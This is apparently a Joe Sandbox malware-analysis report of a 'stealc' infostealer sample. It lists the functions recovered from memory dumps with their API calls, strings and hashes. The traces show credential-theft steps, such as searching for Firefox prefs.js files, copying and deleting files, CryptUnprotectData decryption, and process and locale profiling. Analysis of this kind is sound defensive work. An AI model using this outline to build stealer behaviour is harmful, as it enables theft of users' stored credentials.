Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: a+x$a+x
API String ID: 4287319946-1519344589
Opcode ID: 5b18381a78d614363647d51ca389840577181fef94b240dbedc6296476d3cb5c
Instruction ID: d015f776d446a717e06e3dc2575cb90feebd5237906c624963e5ef4084c6a9ae
Opcode Fuzzy Hash: 5b18381a78d614363647d51ca389840577181fef94b240dbedc6296476d3cb5c
Instruction Fuzzy Hash: 4B5180B0950208ABDF20DF50DD49BEE77B8FB04341F108198B609A71C5DB786A89CF95

Function 0077F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007915B8,00790D96), ref: 0077F71E
StrCmpCA.SHLWAPI(?,007915BC), ref: 0077F76F
StrCmpCA.SHLWAPI(?,007915C0), ref: 0077F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0077FAB1
FindClose.KERNEL32(000000FF), ref: 0077FAC3

Strings

prefs.js, xrefs: 0077F812

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 833ee9718d9f7762c4634086d6ef686a1fa0a7a3e490a66044297ae241c3d9c5
Instruction ID: a56f7249def4861d376842bda6ef3ed8c497e12d8040d051b8fcc81f5e38b63f
Opcode Fuzzy Hash: 833ee9718d9f7762c4634086d6ef686a1fa0a7a3e490a66044297ae241c3d9c5
Instruction Fuzzy Hash: 64B15171950108EBDF24FF60DD9AAEE7379AF54300F4081A9E40A96141EF3C6B49CBA2

Function 007716D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00795124,?,00771F2C,?,007951CC,?,?,00000000,?,00000000), ref: 00771923
StrCmpCA.SHLWAPI(?,00795274), ref: 00771973
StrCmpCA.SHLWAPI(?,0079531C), ref: 00771989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00771D40
DeleteFileA.KERNEL32(00000000), ref: 00771DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00771E20
FindClose.KERNEL32(000000FF), ref: 00771E32

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

Strings

\*.*, xrefs: 007717F1

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 719d4079c2bff020fb83e97501a96d7f23a057a500733e12d7d4a49ce3eece29
Instruction ID: 5185a0b38b4571a83dba480abe7996bf2c39d8857390f489a17d8e48fd310bc5
Opcode Fuzzy Hash: 719d4079c2bff020fb83e97501a96d7f23a057a500733e12d7d4a49ce3eece29
Instruction Fuzzy Hash: 0412C371950118EAEF15FB60DC9AAED7378AF54300F4041EAB50A66091EF3C6F49CFA2

Function 0077DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007914B0,00790C2A), ref: 0077DAEB
StrCmpCA.SHLWAPI(?,007914B4), ref: 0077DB33
StrCmpCA.SHLWAPI(?,007914B8), ref: 0077DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0077DDCC
FindClose.KERNEL32(000000FF), ref: 0077DDDE

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 70b3803f565bd6bb21a21e529508c0c6bb164e85a4be19cdbdfe523fb53e47e4
Instruction ID: c6276bec7ee827b282deb9d8bf07a0299013f57f40beab0869bc3a7917e16551
Opcode Fuzzy Hash: 70b3803f565bd6bb21a21e529508c0c6bb164e85a4be19cdbdfe523fb53e47e4
Instruction Fuzzy Hash: 08916772910104EBDF14FB70EC5A9ED737DAF84340F408669F90A96151EE3CAB19DBA2

Function 0077E430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00790D73), ref: 0077E4A2
StrCmpCA.SHLWAPI(?,007914F8), ref: 0077E4F2
StrCmpCA.SHLWAPI(?,007914FC), ref: 0077E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0077EBDF

Strings

w, xrefs: 0077EBF5, 0077E5EB, 0077E71C, 0077E85B, 0077E4B9, 0077E5EE, 0077E71F, 0077E85E
\*.*, xrefs: 0077E44D

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$w
API String ID: 433455689-886519441
Opcode ID: 9794b4226ab34e66b74375e73d90def39c58eeb217b828d3063d341078fd551e
Instruction ID: 4e05a0a8f80998c5c174bc6f0880eef7f9212315fc2df2e11ff1c0d6408ddeca
Opcode Fuzzy Hash: 9794b4226ab34e66b74375e73d90def39c58eeb217b828d3063d341078fd551e
Instruction Fuzzy Hash: 6F122471950118EAEF15FB60DC9AEED7378AF54300F4045EAB50A66091EF3C6F49CBA2

Function 00787B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

GetKeyboardLayoutList.USER32(00000000,00000000,007905AF), ref: 00787BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00787BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00787C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00787C62
LocalFree.KERNEL32(00000000), ref: 00787D22

Strings

/ , xrefs: 00787C7F

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: a9a7f4ef45931579696c513c56dfc47e54032c71c67b35b7f19c0caee528a284
Instruction ID: 259be32d6398411311b35125ad8f3a70875c309a511d080169474ccfd6f77d13
Opcode Fuzzy Hash: a9a7f4ef45931579696c513c56dfc47e54032c71c67b35b7f19c0caee528a284
Instruction Fuzzy Hash: 1F413E71994218EBDB24EB94DC99BEDB3B8FF44700F2041D9E40A62191DB786F85CFA1

Function 00789600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0078961E
Process32First.KERNEL32(00790ACA,00000128), ref: 00789632
Process32Next.KERNEL32(00790ACA,00000128), ref: 00789647
StrCmpCA.SHLWAPI(?,00000000), ref: 0078965C
CloseHandle.KERNEL32(00790ACA), ref: 0078967A

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 53940d8ae11d41f14b60c4e4c3e094ed2e5a3b3682cc9de9ee6d23a35ce3f5d5
Instruction ID: 5c38e5bc9e7e10190fc91864212762dbc101d3cde4a9d5d081164704c82edc2a
Opcode Fuzzy Hash: 53940d8ae11d41f14b60c4e4c3e094ed2e5a3b3682cc9de9ee6d23a35ce3f5d5
Instruction Fuzzy Hash: 63011E75A54208EBCB14DFA5DD98BEDB7F8EF48710F144288AA05A7250EB34DB40DF51

Function 00779B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00779B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00779BA3
memcpy.MSVCRT(?,?,?), ref: 00779BC6
LocalFree.KERNEL32(?), ref: 00779BD3

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 15c6d6c518aa2d79fdad30c4c2476993fd93c16856e5cc6d729395555cceb05d
Instruction ID: c5ffd872a3681835e2d108dd727ce078f5a7aa8f3baebe7a2ff1830b7d8e5c31
Opcode Fuzzy Hash: 15c6d6c518aa2d79fdad30c4c2476993fd93c16856e5cc6d729395555cceb05d
Instruction Fuzzy Hash: 1911BAB4A00209EFDB04DF94D985AAE77B5FF89300F104558E91997350D774AE50CF61

Function 00787A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000), ref: 00787A63
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000,?), ref: 00787A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CFF9C0,00000000,?,00790E10,00000000,?,00000000,00000000,?), ref: 00787A7D
wsprintfA.USER32 ref: 00787AB7

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
